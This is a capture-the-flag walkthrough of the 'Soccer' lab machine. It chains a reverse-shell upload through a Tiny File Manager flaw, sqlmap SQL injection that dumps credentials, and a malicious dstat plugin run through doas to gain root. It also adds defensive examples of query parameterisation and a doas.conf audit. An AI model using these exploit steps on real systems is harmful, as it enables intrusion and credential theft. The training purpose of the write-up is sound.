Proof of Concept
10.129.9.50
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmail

Initial Access
Visiting the web service on port 80 redirects to http://soccer.htb
┌──(kali㉿kali)-[~/Soccer]
└─$ sudo nmap 10.129.9.50 --open --min-rate 3000 -oN scan -sCV -p80
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-16 11:19 -0500
Nmap scan report for 10.129.9.50
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds

Set up the /etc/hosts file
┌──(kali㉿kali)-[~/Soccer]
└─$ cat /etc/hosts
<SNIP>
10.129.9.50 soccer.htb

Subdirectory enumeration found http://soccer.htb/tiny/
┌──(kali㉿kali)-[~/Soccer]
└─$ feroxbuster -u http://soccer.htb -t 100 -s 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb/
🚩 In-Scope Url │ soccer.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 147l 526w 6917c http://soccer.htb/
[####################] - 87s 90021/90021 0s found:5 errors:0
[####################] - 60s 30000/30000 504/s http://soccer.htb/
[####################] - 62s 30000/30000 482/s http://soccer.htb/tiny/
[####################] - 62s 30000/30000 488/s http://soccer.htb/tiny/uploads/

Opening http://soccer.htb/tiny/ shows the login page of the "Tiny File Manager" service, and the default administrator account "admin/admin@123" logs in.
After logging in, the instance turned out to be running Tiny File Manager version 2.4.3.
Tiny File Manager 2.4.3 has a file upload vulnerability (CVE-2021-45010).
At http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads, upload a reverseshell.php that calls back to the attacker;
then start an nc listener and open http://soccer.htb/tiny/uploads/reverseshell.php, and the reverse shell connects.
┌──(kali㉿kali)-[~/Soccer/CVE-2021-45010-TinyFileManager-Exploit]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.9.50] 53990
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
13:40:20 up 26 min, 0 users, load average: 0.08, 0.05, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$

Auth as player
Another subdomain was found in the target machine's /etc/hosts file
- soc-player.soccer.htb
www-data@soccer:/$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb
127.0.1.1 ubuntu-focal ubuntu-focal

Add the subdomain to the attacker machine's /etc/hosts file
┌──(kali㉿kali)-[~/Soccer]
└─$ cat /etc/hosts
<SNIP>
10.129.9.50 soccer.htb soc-player.soccer.htb

After registering and logging in at http://soc-player.soccer.htb, you land on /check, a page that looks up a ticket number. That lookup is vulnerable to SQL injection; the payload below changes its answer:
1 or '1'='1'--
The rest of this step uses sqlmap to extract the database, which turned up the soccer_db database.
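Why the ticket lookup can be driven this way, and what the fix looks like, as an added example that is not part of the original writeup: the ticket table, its three rows and the "exists"/"missing" reply strings are constructed, and sqlite3 stands in for the target's MySQL so the file runs offline. The vulnerable handler splices the JSON id value straight into the WHERE clause, so sqlmap's recorded payload -7285 OR 5686=5686 turns a miss into a hit while -7285 OR 5686=5687 does not; that yes/no difference is the oracle a boolean-based blind extraction reads one bit at a time. Binding the value as a query parameter removes the oracle.

```python
"""Vulnerable vs. parameterised ticket lookup, modelled on a /check endpoint
that receives {"id": ...} as a JSON message. Added example: the schema, rows
and reply strings are constructed; sqlite3 stands in for the target's MySQL."""
import json
import sqlite3


def make_db():
    """Constructed ticket table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO tickets VALUES (?, ?)",
                     [(1324, "player"), (2001, "alice"), (2002, "bob")])
    return conn


def lookup_vulnerable(conn, ticket_id):
    """The flaw: the client-supplied value is pasted into the SQL text,
    so 'OR 5686=5686' becomes part of the WHERE clause."""
    query = f"SELECT id, owner FROM tickets WHERE id = {ticket_id}"
    return conn.execute(query).fetchall()


def lookup_safe(conn, ticket_id):
    """The fix: the value is bound as a parameter, so it can only ever be
    compared against the id column and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, owner FROM tickets WHERE id = ?", (ticket_id,)
    ).fetchall()


def handle_message(conn, raw, lookup):
    """Emulates the message handler: one JSON message in, a two-state reply
    out. With the vulnerable lookup that reply is the yes/no oracle a
    boolean-based blind injection reads."""
    try:
        ticket_id = json.loads(raw)["id"]
    except (ValueError, KeyError, TypeError):
        return "bad request"
    return "exists" if lookup(conn, ticket_id) else "missing"


if __name__ == "__main__":
    db = make_db()
    for payload in ('{"id":"1324"}',
                    '{"id":"-7285 OR 5686=5686"}',    # sqlmap's recorded payload
                    '{"id":"-7285 OR 5686=5687"}',    # same shape, false condition
                    '{"id":"1 or \'1\'=\'1\'--"}'):   # the manual test from the writeup
        print(f"{payload:32} vulnerable={handle_message(db, payload, lookup_vulnerable):8}"
              f" safe={handle_message(db, payload, lookup_safe)}")
```

Run stand-alone it prints one line per payload; only the first payload gets "exists" from the safe lookup, whereas the vulnerable lookup also says "exists" for the true-condition injections.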
┌──(kali㉿kali)-[~/Soccer]
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10
___
__H__
___ ___[.]_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:00:58 /2026-02-16/
[13:00:58] [INFO] setting file for logging HTTP traffic
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[13:00:58] [INFO] testing connection to the target URL
[13:01:02] [INFO] testing if the target URL content is stable
[13:01:02] [INFO] target URL content is stable
[13:01:02] [INFO] testing if (custom) POST parameter 'JSON id' is dynamic
[13:01:03] [WARNING] (custom) POST parameter 'JSON id' does not appear to be dynamic
[13:01:04] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON id' might not be injectable
[13:01:05] [INFO] testing for SQL injection on (custom) POST parameter 'JSON id'
[13:01:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:01:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:02:02] [INFO] (custom) POST parameter 'JSON id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[13:02:17] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[13:02:17] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:02:17] [INFO] checking if the injection point on (custom) POST parameter 'JSON id' is a false positive
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 117 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
[13:02:35] [INFO] testing MySQL
[13:02:36] [INFO] confirming MySQL
[13:02:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:02:43] [INFO] fetching database names
[13:02:43] [INFO] fetching number of databases
[13:02:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:02:43] [INFO] retrieved: 5
[13:02:48] [INFO] retrieved: mysql
[13:03:13] [INFO] retrieved: information_schema
[13:04:46] [INFO] retrieved: performance_schema
[13:06:12] [INFO] retrieved: sys
[13:06:28] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[13:07:14] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:07:14 /2026-02-16/

Enumerating the tables in soccer_db found the accounts table
┌──(kali㉿kali)-[~/Soccer]
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10 -v 0 -D soccer_db --tables
___
__H__
___ ___[']_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:12:54 /2026-02-16/
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
back-end DBMS: MySQL 8
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[*] ending @ 13:13:42 /2026-02-16/

Dumping the accounts table yielded the player account's credentials
- player:PlayerOftheMatch2022
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10 -v 0 -D soccer_db -T accounts --dump
___
__H__
___ ___[']_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:14:06 /2026-02-16/
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
back-end DBMS: MySQL 8
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+

SSH login succeeded with the recovered player credentials
┌──(kali㉿kali)-[~/Soccer]
└─$ sshpass -p 'PlayerOftheMatch2022' ssh player@soccer.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Feb 16 15:34:57 UTC 2026
System load: 0.08
Usage of /: 70.7% of 3.84GB
Memory usage: 22%
Swap usage: 0%
Processes: 233
Users logged in: 0
IPv4 address for eth0: 10.129.9.50
IPv6 address for eth0: dead:beef::250:56ff:feb0:a195
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19
player@soccer:~$

Read user.txt
player@soccer:~$ cat user.txt
2d984bca4f531de3759e58970c188268
player@soccer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:a1:95 brd ff:ff:ff:ff:ff:ff
inet 10.129.9.50/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3059sec preferred_lft 3059sec
inet6 dead:beef::250:56ff:feb0:a195/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:a195/64 scope link
valid_lft forever preferred_lft forever

Privilege Escalation
Found that the /usr/local/bin/doas binary has the SetUID bit set
player@soccer:~$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
-rwsr-xr-x 1 root root 142792 Nov 28 2022 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 51344 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Mar 30 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 22840 Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 39144 Feb 7 2022 /usr/bin/umount
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55528 Feb 7 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 67816 Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 44784 Nov 29 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 85064 Nov 29 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 68208 Nov 29 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 88464 Nov 29 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53040 Nov 29 2022 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 123560 Nov 25 2022 /snap/snapd/17883/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 85064 Mar 14 2022 /snap/core20/1695/usr/bin/chfn
-rwsr-xr-x 1 root root 53040 Mar 14 2022 /snap/core20/1695/usr/bin/chsh
-rwsr-xr-x 1 root root 88464 Mar 14 2022 /snap/core20/1695/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55528 Feb 7 2022 /snap/core20/1695/usr/bin/mount
-rwsr-xr-x 1 root root 44784 Mar 14 2022 /snap/core20/1695/usr/bin/newgrp
-rwsr-xr-x 1 root root 68208 Mar 14 2022 /snap/core20/1695/usr/bin/passwd
-rwsr-xr-x 1 root root 67816 Feb 7 2022 /snap/core20/1695/usr/bin/su
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /snap/core20/1695/usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Feb 7 2022 /snap/core20/1695/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51344 Oct 25 2022 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Mar 30 2022 /snap/core20/1695/usr/lib/openssh/ssh-keysign

Checking the doas configuration shows that /usr/bin/dstat can be run as root
player@soccer:~$ find / -name "*doas.conf*" -exec ls -l {} \; 2>/dev/null
-rw-r--r-- 1 root root 7446 Nov 17 2022 /usr/local/share/man/man5/doas.conf.5
-rw-r--r-- 1 root root 48 Nov 17 2022 /usr/local/etc/doas.conf
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat

Located the dstat directories and created a plugin named dstat_exploit.py under /usr/local/share/dstat/.
player@soccer:~$ find / -type d -name dstat 2>/dev/null
/usr/share/doc/dstat
/usr/share/dstat
/usr/local/share/dstat
player@soccer:~$ cd /usr/local/share/dstat
player@soccer:/usr/local/share/dstat$ vi dstat_exploit.py
player@soccer:/usr/local/share/dstat$ cat dstat_exploit.py
import os
os.system('chmod +s /usr/bin/bash')

Now run dstat through doas with the --exploit flag and obtain a root shell.
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --exploit
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
Module dstat_exploit failed to load. (name 'dstat_plugin' is not defined)
None of the stats you selected are available.
player@soccer:/usr/local/share/dstat$ bash -p
bash-5.0# whoami
root
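What a configuration audit for this pattern looks like, as an added example that is not from the writeup: the doas.conf text and the temporary directories built by demo_layout() are constructed, the rule grammar follows doas.conf(5), and DSTAT_PLUGIN_DIRS are the two plugin directories found on the target. A permit rule that reaches root is only as strong as the command it names; dstat imports dstat_<name>.py from its plugin directories, so a plugin directory the permitted user can write to turns a "harmless" monitoring tool into root code execution. The audit flags any-command root rules and dstat rules whose plugin directory is writable by the permitted user.

```python
"""Audit a doas.conf for permit rules that reach root through a command whose
plugin search path the permitted user can write to (the dstat case). Added
example: SAMPLE_CONF and the directories from demo_layout() are constructed;
the rule grammar follows doas.conf(5)."""
import os
import stat
import tempfile

# Directories dstat searches for dstat_<name>.py plugins, as seen on the target.
DSTAT_PLUGIN_DIRS = ("/usr/share/dstat", "/usr/local/share/dstat")

# Constructed config; the first rule mirrors the one in /usr/local/etc/doas.conf.
SAMPLE_CONF = """# constructed for this example
permit nopass player as root cmd /usr/bin/dstat
permit persist alice as root cmd /usr/bin/apt args update
permit :wheel
"""

OPTION_WORDS = ("nopass", "nolog", "persist", "keepenv")


def parse_doas_conf(text):
    """One dict per permit/deny rule. 'as' defaults to root, as doas does."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tok = line.split()
        if tok[0] not in ("permit", "deny"):
            continue
        rule = {"action": tok[0], "options": set(), "identity": None,
                "target": "root", "cmd": None, "args": None}
        i = 1
        while i < len(tok) and tok[i] in OPTION_WORDS:
            rule["options"].add(tok[i])
            i += 1
        if i < len(tok) and tok[i] == "setenv":       # skip setenv { VAR=val ... }
            while i < len(tok) and not tok[i].endswith("}"):
                i += 1
            i += 1
        if i >= len(tok):                              # malformed: no identity
            continue
        rule["identity"] = tok[i]
        i += 1
        if i < len(tok) and tok[i] == "as":
            rule["target"], i = tok[i + 1], i + 2
        if i < len(tok) and tok[i] == "cmd":
            rule["cmd"], i = tok[i + 1], i + 2
            if i < len(tok) and tok[i] == "args":
                rule["args"] = tok[i + 1:]
        rules.append(rule)
    return rules


def dir_writable_by(path, uid, gids):
    """Do the mode bits let a user with uid/gids create files in path?"""
    st = os.stat(path)
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_mode & stat.S_IWOTH:
        return True
    if st.st_mode & stat.S_IWGRP and st.st_gid in gids:
        return True
    return bool(st.st_mode & stat.S_IWUSR) and st.st_uid == uid


def audit(rules, user_ids, plugin_dirs=DSTAT_PLUGIN_DIRS):
    """user_ids maps identity -> (uid, set of gids). Returns finding strings."""
    findings = []
    for r in rules:
        if r["action"] != "permit" or r["target"] != "root":
            continue
        if r["cmd"] is None:
            findings.append(f"{r['identity']}: any command as root")
            continue
        if os.path.basename(r["cmd"]) != "dstat" or r["identity"] not in user_ids:
            continue
        uid, gids = user_ids[r["identity"]]
        for d in plugin_dirs:
            if os.path.isdir(d) and dir_writable_by(d, uid, gids):
                findings.append(f"{r['identity']}: root dstat with writable plugin dir {d}")
    return findings


def demo_layout():
    """Constructed stand-in for the two plugin dirs: one 0755, one world-writable."""
    base = tempfile.mkdtemp(prefix="dstat-audit-")
    locked, weak = os.path.join(base, "share-dstat"), os.path.join(base, "local-share-dstat")
    os.mkdir(locked)
    os.mkdir(weak)
    os.chmod(locked, 0o755)
    os.chmod(weak, 0o777)
    return locked, weak


def demo_findings():
    """Audit SAMPLE_CONF against demo_layout(); 'player' gets a uid that owns
    nothing here, so only group/other bits decide."""
    locked, weak = demo_layout()
    ids = {"player": (os.getuid() + 1, set()), "alice": (os.getuid() + 2, set())}
    return audit(parse_doas_conf(SAMPLE_CONF), ids, plugin_dirs=(locked, weak))


if __name__ == "__main__":
    for finding in demo_findings():
        print("FINDING:", finding)
```

On a real host you would read /usr/local/etc/doas.conf, resolve each identity with pwd and grp, and keep the default DSTAT_PLUGIN_DIRS; the fix for the finding is either a plugin directory owned by root and mode 0755 or, better, a doas rule that does not grant root for a tool that loads code from disk.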
Read root.txt
bash-5.0# cat root.txt
33f6ecde3bc2d3af79bc5023e8333150
bash-5.0# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:a1:95 brd ff:ff:ff:ff:ff:ff
inet 10.129.9.50/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2106sec preferred_lft 2106sec
inet6 dead:beef::250:56ff:feb0:a195/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:a195/64 scope link
valid_lft forever preferred_lft forever